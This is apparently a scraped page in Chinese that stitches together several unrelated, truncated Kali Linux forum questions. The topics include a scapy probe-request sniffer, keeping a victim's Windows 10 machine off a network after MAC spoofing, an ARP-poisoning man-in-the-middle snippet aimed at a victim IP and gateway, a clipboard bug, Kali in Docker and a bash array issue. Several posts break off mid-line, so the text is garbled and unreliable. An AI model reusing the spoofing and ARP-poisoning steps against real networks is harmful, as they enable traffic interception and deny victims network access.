我正在编写一个python脚本来检测探测请求,并打印出要探测的设备MAC地址、制造商和SSID。我现在想添加发现设备名称的功能(例如:Gio的iPhone5),并将其与其他结果一起打印。
if p.haslayer(Dot11ProbeReq):
mac = str(p.addr2)
if p.haslayer(Dot11Elt):
if p.ID == 0:
ssid = p.info
我已经成功地使用macchanger工具(OS: Kali linux)对我的开放(Ad)网络进行了MAC欺骗攻击。
我想知道保持连接正常的常用技术是什么(所以,让机器与真正的mac保持网络外的方式),因为当我试图使用受害者的机器(Windows 10)重新连接时,Windows机器显然会将我的Kali主机从网络中踢出来。
作为我的项目的一部分,我正在尝试使用scapy进行MiTM攻击。以下是详细信息:
pkt=ARP(op=1,hwdst='00:0c:29:9c:70:2e',pdst='192.168.1.105',psrc='192.168.1.1')
send(pkt,loop=1)
hwdst=Kali Linux MAC (attacker)
pdst= Victims IP (victim)
psrc= Gateway router IP (router)
为了进行MiTM攻击,我启用了'ip转发‘,使用以下命令:
ec
我只是为我的Kali Linux下载一些桌面环境。然后在第二次使用时(重新启动后),我尝试在终端中复制MAC地址。但是当我单击“粘贴”时,文本甚至不能显示在我的屏幕上。我试过用右键点击并安装Parcellite,但什么也没发生。我也试图回到我的预装DE (Gnome),但也没有任何价值。
详细信息:
OS : Kali Linux
Kernel : x86_64 Linux 4.14.0-kali3-amd64
DE : XFCE
WM : Xfwm4
CPU : Intel Celeron N2840 @ 2x 2.5 GHz
RAM : 2 GB
DualBoot with Windows
这是我的剧本:
#!/usr/bin/env python
import sys
from scapy.all import *
from subprocess import *
call(["clear"])
print "Probe Investigator"
print "-----------------------------------------------------"
intf = raw_input("Enter the Name of the interface to sniff: ")
print (
到目前为止,我正在使用Windows 10 &我想在Docker上运行kali Linux。为此,我从卡利官方网站这里获取了这份副本。
但是在运行之后,我发现它只是一个基本的操作系统--它不包含kali著名的所有工具,也不是一个完整的闪存副本。因此,我想要一个完整的卡利形象码头运行,我可以找到完整的卡利与所有的工具副本的码头。
使用和安装解决了列出的元数据包
apt-get更新&和apt-缓存搜索kali-linux - Linux - ARM - Kali - Linux系统Kali - Linux核心- Kali Linux基础系统Kali Linux默认系统Kali Li
root@kali-linux:~/Softwares/Softwares/Tools/dirsearch# array=()
root@kali-linux:~/Softwares/Softwares/Tools/dirsearch# for i in 1 2 3 4
> do
> array+=($i)
> done
root@kali-linux:~/Softwares/Softwares/Tools/dirsearch# echo $array
1
root@kali-linux:~/Softwares/Softwares/Tools/dirsearch# for i